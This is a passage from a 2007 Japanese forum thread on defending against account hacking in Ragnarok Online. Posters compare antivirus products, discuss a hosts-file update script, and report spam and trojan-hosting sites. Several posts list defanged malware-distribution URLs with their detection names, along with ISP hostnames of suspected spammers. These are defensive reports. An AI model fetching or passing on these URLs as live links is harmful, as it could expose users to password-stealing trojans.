垢ハックだけに構ってらんないのはKasperskyも変わらんのだが。
PC-cillin(「ウイルスバスター」)の知名度や評価は
日本と台湾以外ではそもそも大したことないよ。

969 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 15:00 ID:i8Ny1gfr0

米国でもトップシェアソフトは違うし、またヨーロッパでも違うんだな
NOD32もカスペと検出率は遜色ないと思う

中級者向けみたいな評価だけど、実際殆ど設定弄る所ないから初心者向けだと思う
セキュ版の荒れ具合が相当あれだが・・・何より軽いのが○

970 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 15:11 ID:gazO9zKi0

軽さならDr.WEBのほうがずっと上だけど、こちらは
能力的にはMcAfeeくらいなのでKasperskyやNOD32に一歩譲る。
検出力からしたら恐ろしく軽いな。
もっともファイアウォールが付いてないのも大きいかもしれん
(Outpost等別途必要。次期バージョンで付属すると聞いた)。

ファイルとネットワークは別なんだから別途用意しろ、というのは
おかしくないんだけど、統合スイートばかりなこのご時世では
初心者向けとは言えない。ただでさえNorton360とか変なの出てきてるし。

971 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 15:15 ID:gazO9zKi0

ってLiveRO向けだな、すまん。

972 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 15:16 ID:i8Ny1gfr0

FWソフトとか、いちいち報告してくるだけで機能的にはOS標準で間に合ってる気がするのよね
そもそもルーターの方でフィルタできるし、ログ残るし・・・PG2にもログもかなり使える

それを敷居が高いとするならNOD32は使わん方がいいのかもね

973 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 15:17 ID:i8Ny1gfr0

素で間違えてた・・・スマン

974 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 15:27 ID:5m9Rb6CI0

セキュ雑談スレより輸入。
住人が被ってるだろうから知ってるとは思うけど、>871の流れから生まれた
hostsの自動更新スクリプトが公開されてる。

>969 名前：936 Mail：sage 投稿日：07/04/25 (水) 01:15 ID:gDGvy1n80
>
>あこすれてんぷら避難所を間借りする事で公開しました。
>ttp://acopri.s250.xrea.com/index.php?hostsRenewScript
>
>一応説明を付けていますが、自己責任、という事でお願いします。
>cfgとvbsの２ファイル構成で、動作に必要なwget等は付属してません。
>
>配布ページとファイルを見て使ってみてください。

実際に使ってみたが、正常に更新してくれる。

配布ページの説明は少々難し目に書かれてて初心者お断りになってるが、ファイルと
併せて見たら、ハマる所は全く無い。
組み方も安全に気を使ったものになっていて、設定をミスった場合何も更新されない。
モノがモノだけに、見かけよりは安全に作られてる。

何ともツンデレ仕様なスクリプトだが、hostsの更新をサボりがちな人には向いてると思う。

975 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 15:48 ID:XyEv0Jlt0

>>964
あ、このスレではNOD32とカスペを推奨することが多いみたいなので触れなかったけど
トレンドマイクロに送った検体も、Submit Suspicious File/Undetected Malware となって
対応待ちリストにちゃんと入ってるよ。

>>942
NOD32：定義バージョン 2214(20070424)で「Win32/PSW.Lineage.BJD トロイ」として検出される。
これも報告日のパターンで即日対応した模様。圧縮形式fが違うだけだから早く検知できたのかな。

>>970
次スレ依頼忘れてないか〜〜〜〜？

976 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 15:57 ID:EHVPwyXI0

カスペの対応速度はえーな。

どっかのオンラインゲーム運営会社に爪の垢煎じて飲ませてやりたいくらいだ。
バグを何年も放置とかあるからな＾＾

977 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 16:40 ID:XyEv0Jlt0

前スレの使えそうな内容ダイジェストは以上です。他に気付いたものがあったら適宜貼り付けて下さい。

間で連続投稿規制に引っ掛かりました。テンプレにするには長過ぎるってことですね。orz
通称本スレ（？）のテンプレから引用して締めっ。



■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■

※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません

【参考アドレス】
・ROアカウントハック報告スレのまとめ？サイト
　http://sky.geocities.jp/vs_ro_hack/
・安全の為に (BSWikiより)
　http://smith.xrea.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
　http://lineage.nyx.bne.jp/

【このスレでよく出てくるアプリケーション】
・PeerGuardian2（設定などはリネージュ資料室内・セキュリティ対策参照）
　ttp://lineage.nyx.bne.jp/misc/security/?id=basic-ipfilter

978 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 16:42 ID:XyEv0Jlt0

盛大に誤爆すいません。orz

LiveROの方に書込もうとした内容を流しちゃいました。・・・そしてLiveROは連投規制かかった罠。(o_ _)o

979 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 16:47 ID:gazO9zKi0

>>975
うお、俺だった。依頼してきた。

980 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 16:50 ID:XyEv0Jlt0

どなたか分かりませんが、転記ありがとうございました。

>>979 依頼乙…というか、１以降のテンプレ書いてないぞ〜。
あと、LiveROの方は新スレ立ったんで、アドレス変更でお願いしまつ。

セキュリティ対策、質問・雑談スレ2
http://enif.mmobbs.com/test/read.cgi/livero/1177485590/

981 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 16:53 ID:Fby6T6Vn0

>>974
誰でも更新できて業者も見るWIKIにスクリプト置くとかかなりまずいと思う・・・
こういうのが必要な人ってMD5の意味もわからん人たちが対象だし。

982 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 16:56 ID:BVjZK7Qx0

俺はやっぱ、NOD32のヒューリスティックスキャンは侮れないんだなぁと思う。

983 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 16:57 ID:Fby6T6Vn0

と思ったら凍結されてるのか。
WIKIのセキュについてはよくわからんがそれなりには安心していいのかな。

984 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 17:01 ID:5m9Rb6CI0

テンプレの>2-6、そのままでいいのかね？

セキュ雑談スレの新スレは当然含めるにしても、報告テンプレの改定案(>872)や
まとめサイトのPG2の解説ページ(>871)やhosts更新スクリプト(>974)等、変更や
追加した方がいいものがありそうなんだが。

985 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 17:08 ID:XyEv0Jlt0

＞報告テンプレの改定案
この際だし、入れようよ

＞まとめサイトのPG2の解説ページ
これはまとめサイトの中の人に、まとめサイトTOPページから、分かりやすいようにして貰えばいいんじゃない？

＞hosts更新スクリプト
スレではなく、まとめサイトで（PG2と同じように）紹介するのがいいんじゃないかな。

986 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 17:24 ID:gazO9zKi0

テンプレ依頼出してきた。カスペ体験版のリンクはジャストシステムに変更。
板の看板にLiveROスレがあるんだけど、あれの変更はどこに依頼出せばいいんだ?

987 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 17:38 ID:5m9Rb6CI0

>983
あこすれ避難所は3月末ぐらいに開設してから、今まで一度もハクアドの貼り付けや
業者Spamの貼り付けを喰らってないはず。
かなり安全な部類に入る。

>986
管理板の目安箱スレかな？

988 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 19:31 ID:Fby6T6Vn0

>>987
元のWIKIも残ってるからそっちに流れるだろうしね。対策もそれなりに取ってるのも知ってる。
でもそれは安心する理由にはならない。
できたばっからから被害がないのは当然っちゃ当然だしね。

でも書き換えができないようになってんならまあ安心していいのかな。
添付ファイルの書き換えとかはできるのか知らんけど。

989 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 19:59 ID:NuNrFjzm0

>>975
だからさ・・・問題なのはその対応速度の速さだろ？

990 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 20:27 ID:XyEv0Jlt0

>>989
決して遅くはないと思うぞ。
数日以内に対応されるのは早い方だと思う。１週間以内だと普通じゃない？
NOD32とかカスペでも即日対応ではないケースもあるし。

雑談は、ともかく、多分間に合うと思うけど念のため、退避場所を貼り。

【一時】新スレ遅延時避難スレ('05/02/26)【誘導】
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1109367640/

991 ：964 sage ： 2007/04/25(水) 20:35 ID:r5wdakhb0

>>975
おー、ありがとう。提出かぶっちゃったけど、まあいっか。
そして、今日配布された新パターンで、以下のファイルは検出可になってます。
・www■gomeodc■com/mmkk■com　　（ウイルス名：TSPY_NILAGE.IH）
・www■vviccd520■com/img/mmdd■exe　　（ウイルス名：TSPY_NILAGE.HU）

バスターユーザーの人はパターン更新しておきましょう。

992 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 21:18 ID:AdUQjF8Q0

４月２０日と２５日にEir板でまた新スレを作って書き込まれていたので一応報告します。
（本文は途中省略してもいいよね？）
----------------------------------------------------------------
ＲＯ系コスプレ

1 ：ゲーテ：2007/04/20(金) 20:52:17 ID:A5QPqJ5U0
ラグナ系のコスプレをされている方にお尋ねしたいです。
公式絵やキャラ絵などでは、実際に衣装作成するには
情報が不充分であることがとても多いですよね。
皆様、どうやって補完されていますか？
・・・（長いので省略）・・・
よろしくお願いいたします。
http://www■jpxpie6-7net■com/web/read_cgi/
----------------------------------------------------------------
書き込まれたホスト「OFSfb-20p3-53.ppp11.odn.ad.jp」

----------------------------------------------------------------
AAA級 ヴィトン、シャネル...　

1 ：玲木辰美：2007/04/25(水) 07:14:31 ID:qrA8dirQ0
AAA級 ヴィトン、シャネル、グッチ、高級腕時計在庫処分価格なのでヴィトン、エルメ

ス、グッチ、シャネルなどが激安です。当店の主要な経営のブランド：Louis Vuitton(

・・・（長いので省略）・・・

★☆★━━━━━━━━━━━━━━★☆★
■URL：http://www■gamesmusic-realcgi■net/web/read_cgi/
■店長：玲木辰美
■連絡先：lysh830525@yahoo■co■jp
★☆★━━━━━━━━━━━━━━★☆★
----------------------------------------------------------------
書き込まれたホスト「OFSfb-22p1-187.ppp11.odn.ad.jp」

ホストが微妙に違うけど、同じPCなのかな？

993 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 22:20 ID:x//dho9b0

アカウントハック総合対策スレ7
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1177507128/l50
http://gemma.mmobbs.com/test/read.cgi?bbs=ragnarok&key=1177507128&ls=50

994 ：(^ー^*)ノ〜さん sage ： 2007/04/25(水) 23:56 ID:/T/gH9jz0

梅ついでに。

>>992
OFSfb-21p4-127.ppp11.odn.ad.jpの件を04/18に通報したんだけど、
今日メールがきてて、『注意喚起を行わせていただきました』だそうで。
同一人物だった場合もっと厳しい処置になるだろうから、通報してみる
のはありかと思われ。

ちなみにOFSfbで特定の地域を指す筈なので同一人物の可能性は
低くは無いと思います。

995 ：(^ー^*)ノ〜さん sage ： 2007/04/26(木) 00:01 ID:97PVjrWn0

ofsfb-12p1-64.ppp11.odn.ad.jp
ofsfb-21p3-184.ppp11.odn.ad.jp
ofsfb-23p3-108.ppp11.odn.ad.jp
ofsfb-21p4-156.ppp11.odn.ad.jp

もあるよ

996 ：(^ー^*)ノ〜さん sage ： 2007/04/26(木) 00:30 ID:lcsWh9iE0

www■livedoor-game■com/bbs/

掲示板になりすましで書き込みされていた記事に
貼り付けられていたもの

出所は中国の模様
やっちゃったかなぁ

997 ：(^ー^*)ノ〜さん sage ： 2007/04/26(木) 00:46 ID:Xwz+SYtR0

>995
それら、黒という意味？
うち２つ、うちのサイトに来た痕跡があったんだが。
幸い罠貼り付けとかは無かったけど。

>996
やっちゃいましたな……
>777で報告されてるように罠ドメイン。

早急にPASS変更と駆除するがよろし。

998 ：(^ー^*)ノ〜さん sage ： 2007/04/26(木) 05:43 ID:m8KUbqAG0

OFSfb-21p4-127.ppp11.odn.ad.jp
OFSfb-22p1-187.ppp11.odn.ad.jp

999 ：(^ー^*)ノ〜さん sage ： 2007/04/26(木) 07:47 ID:GBjufL9Z0

次立ってるので埋めちゃいますよ〜

1000 ：(^ー^*)ノ〜さん sage ： 2007/04/26(木) 07:47 ID:GBjufL9Z0

アカウントハック総合対策スレ7
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1177507128/

1001 ：１００１ ： Over 1000 Thread

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。